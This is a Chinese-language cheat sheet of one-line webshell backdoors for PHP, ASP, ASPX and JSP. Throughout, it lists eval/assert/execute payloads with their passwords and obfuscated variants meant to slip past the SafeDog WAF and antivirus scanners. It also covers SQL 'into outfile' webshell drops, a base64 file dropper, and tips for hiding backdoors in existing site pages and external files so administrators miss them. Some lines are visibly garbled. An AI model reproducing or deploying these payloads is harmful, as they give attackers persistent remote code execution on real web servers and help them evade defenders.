史上最全一句話木馬
PHP
<pre> <body><? @system($_GET["cc"]); ?></body> </pre>
//可執行命令一句話
普通一句話
<?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?>
PHP系列
<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?>
<?php $lang = (string)key($_POST);$lang($_POST['xindong']);?>
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['xindong']);?>
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["xindong"]); ?>
<?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> 密碼是 -7
過狗一句話
select '<?php @eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/mysql-php/1.php'
<?php $_=""; $_[+$_]++; $_=$_.""; $___=$_[+""];//A $____=$___; $____++;//B $_____=$____; $_____++;//C $______=$_____; $______++;//D $_______=$______; $_______++;//E $________=$_______; $________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O $_________=$________; $_________++;$_________++;$_________++;$_________++;//S $_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______; $________++;$________++;$________++;//R $_____=$_________; $_____++;//T $__=$___.$_________.$_________.$_______.$________.$_____; $__($_("ZXZhbCgkX1BPU1RbMV0p")); ?> <?php $_REQUEST['a']($_REQUEST['b']); ?> <?php $t=$_GET['t']; $tt=$_GET['tt']; $s=t;$s($REQUEST[′cc123′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=sert$s=t;$s($REQUEST[′cc123′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=sert$s=t.$ttt; $s($_REQUEST['cc']);?> <?php $t=$_GET['t']; //t=tt $tt=$_GET['tt']; //tt=as $ttt=$_GET['ttt']; //ttt=s $tttt=$_GET['tttt']; //ttt=ert $s=t.$ttt.$tttt;$s($REQUEST[′cc′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=tttt$tttt=$GET[′tttt′];//ttt=sert$s=t.$ttt.$tttt;$s($REQUEST[′cc′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=tttt$tttt=$GET[′tttt′];//ttt=sert$s=t.ttt;$s($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=b;$b=$REQUEST[′b′];//b=as;$c=$REQUEST[′c′];//c=sert;$d=$REQUEST[′d′];//d=c;$e=ttt;$s($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=b;$b=$REQUEST[′b′];//b=as;$c=$REQUEST[′c′];//c=sert;$d=$REQUEST[′d′];//d=c;$e=a.d;$e($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=assert;$b=$REQUEST[′b′];//b=a;$d=d;$e($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=assert;$b=$REQUEST[′b′];//b=a;$d=b; $d($_REQUEST['cc']); ?>PHP過狗<?php if($_POST[x]!=''){$a="base64_decode"; eval($a($_POST[z0]));}?> 密碼:x<%a=request(“gold”)%><%eval a%>
fuck<?phpeval($_POST[a])?>
<?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?> 密碼 4該日志目錄不存在或權限不足,請檢查設置!<?phpeval($_POST[a])?>
幾個變性的php–過防火墻
過狗效果都不錯:
<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['sz']); ?> <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?> <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?>這個是90發的<?php
@$_=“s”.“s”./-/-/“e”./-/-/“r”;
@= / ? ? / ? ? ? / " a " . / ? ? / ? ? ? / _=/*-/*-*/"a"./*-/*-*/ =
/??/???/"a"./??/???/_./-/-*/“t”;
@/ ? ? / ? ? ? / ( _/*-/*-*/( /
??/???/(/-/-/{"_P"./-/-/“OS”./-/-*/“T”}
[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]);?>
密碼-7
phpv9 高版本拿shell
<?php file_put_contents('c7.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NjMjc4OV0pOz8+')); ?>…/…/…/…/html/special/cc/index
ASP
asp 一句話
<%execute(request(“cmd”))%><%execute request(“1”)%>ASP一句話16進制:┼攠數畣整爠煥敵瑳∨≡┩愾 密碼a"%><%Eval(Request(chr(112)))%><%’ p
<%Y=request(“xindong”)%> <%execute(Y)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“xindong”))%>
<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&"-"&“5”&")"&")")%>(密碼是-7)
ASP過安全狗一句話
密碼(pass) <% %> <%a=request(“zl”)%><%eval a%>
ASPX系列
ASPX一句話的 過安全狗效果不怎么樣
不過我認為能支持aspx 百分之8/90支持asp
<%@ Page Language = Jscript %><%var/-/-/P/-/-/=/-/-/“e”+“v”+/-/-/“a”+“l”+"("+“R”+“e”+/-/-/“q”+“u”+“e”/-/-/+“s”+“t”+“[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]”+“,”+"""+“u”+“n”+“s”/-/-/+“a”+“f”+“e”+"""+")";eval(/-/-/P/-/-/,/-/-/“u”+“n”+“s”/-/-/+“a”+“f”+“e”/-/-/);%> 密碼 -7
<%@ Page Language=“Jscript”%><%eval(Request.Item[“xindong”],“unsafe”);%>
密碼是webadmin
aspx一句話
<%@ Page Language=“Jscript” validateRequest=“false” %><%Response.Write(eval(Request.Item[“w”],“unsafe”));%>
JSP
<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
select ‘<?php eval($_POST[cmd];?>’ into outfile ‘C:/Inetpub/wwwroot/mysql-php/1.php’
過護衛神的<%E=request(“1”)%>abc
123456789<%execute E%>
原來代碼是<%execute request(“cmd”)%> 把標簽修改替換下來 為
<scriptlanguage=VBScript runat=server>execute request(“cmd”) 這樣就避開了<%,%>符號!
表中數據段限制,一句話木馬也寫不下的情況
網絡中流傳的最小的木馬代碼是<%eval request("#")%> 如過連這也寫不下怎么辦?
將木馬分開寫就好了!<%Y=request(“x”)%> <%execute(Y)%> 這樣分開寫提交到數據庫就沒問題了!
不過,在ACCESS數據庫中新增加的數據物理位置是在舊數據之前的,所以要先寫<%execute(Y)%>部分。寫好后在客戶端寫密碼時除了填寫"x"以外的任何字符都可以,如果填了"x"就會出錯!
插入一句話容易爆錯
例如
Sub unlockPost() Dim id,replyid,rs,posttable id=Request(“id”) replyid=Request(“replyid”) If Not IsNumeric(id) or id="" Then
寫成
Sub unlockPost(<%eval request("#")%>)
Dim id,replyid,rs,posttable
id=Request(“id”)
replyid=Request(“replyid”)
If Not IsNumeric(id) or id="" Then
就可以了,也可以寫成帶容錯語句的格式!!
<%if request(“cmd”)<>""then execute request(“cmd”)%>
一句話木馬到兩句話木馬的轉型!
一句話木馬服務端原型:<%execute request(“value”)%> ,
變形后:<%On Error Resume Next execute request(“value”)%> ,
至于為什么要用兩句話木馬呢,是由于使我們的后門更加隱蔽.
我也試過用一句話插入WellShell的某個ASP文件里面,可是訪問時經常出錯,而插入兩句話木馬服務端卻可以正常訪問了,對站點的頁面無任何影響.
這樣就達到了隱蔽性更強的目的了,他管理員總不會連自己的網頁文件都刪了吧.
現在我的WellShell都有這樣的后門.選擇要插入兩句話木馬的ASP文件要注意,選一些可以用IE訪問的ASP文件,不要選conn.asp這樣的文件來插入.
當然,連接兩句話木馬的客戶端仍然是用一句木馬的客戶端,不用修改.
一句話免殺:
一:變形法
比如:eval(request("#"))這樣的馬兒呢,一般情況下是不被殺的。但實際上,經常殺毒軟件會把eval(request列為特征碼。所以我們變形一下
E=request(“id”) eval(E)
這樣可達到免殺的目的。
例如:<%execute request(“1”)%> 變形后:
<%E=request(“1”) execute E%>
當然,這種變形是最好做的。
介紹第二種方法:因為很多管理員很聰明,它會檢查ASP文件中的execute和eval函數。所以呢,不管你怎么反編譯,它最終總是要用其中的一個函數來解釋運行,所以還是被發現了。好么,我們用外部文件來調用。建一個a.jpg或者任何不被發現的文件后綴或文件名。寫入 execute(request("#"))當然,你可以先變形后現放上去。然后在ASP文件中插入
來引用它,即可。
不過,管理員可以通過對比文件的方式找到修改過的文件,不過這種情況不多。
在WEBSHeLL中使用命令提示
在使用ASP站長助手6.0時點擊命令提示符顯示“沒有權限”的時候,可以使用ASP站長助手上傳CMD.exe到你的WEBSHELL目錄(其它目錄也行,把上傳以后的CMD.exe絕對路徑COPY出來),再修改你的WEBSHELL找到調用CMD.EXE的代碼。原來的代碼如下
.exec("cmd.exe /c "&DefCmd).stdout.readall
修改為
.exec(“你想上傳的cmd.exe絕對路徑” /c"&DefCmd).stdout.readall
比如你上傳到的目錄是D:\web\www\cmd.exe,那么就修改成
.exec(“D:\web\www\cmd.exe /c”&DefCmd).stdout.readall
支持變異菜刀連接以過安全狗,過啊D 文件掃描的一句話
實已經不是一句話了,好幾句了都。
繼續上次的:我使用的一句話的幾種姿態
這回研究了下PHP,發一下我使用的一句話(可過文件掃描)。
ASP
<?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
密碼z,支持菜刀連接;支持變異菜刀連接以過安全狗。
另外:
ASP
<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"http://",""""),"*",vbCrlf)End FunctionExecute MorfiCoder(")//z/*/(tseuqer lave") %>
ASPX
<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %>
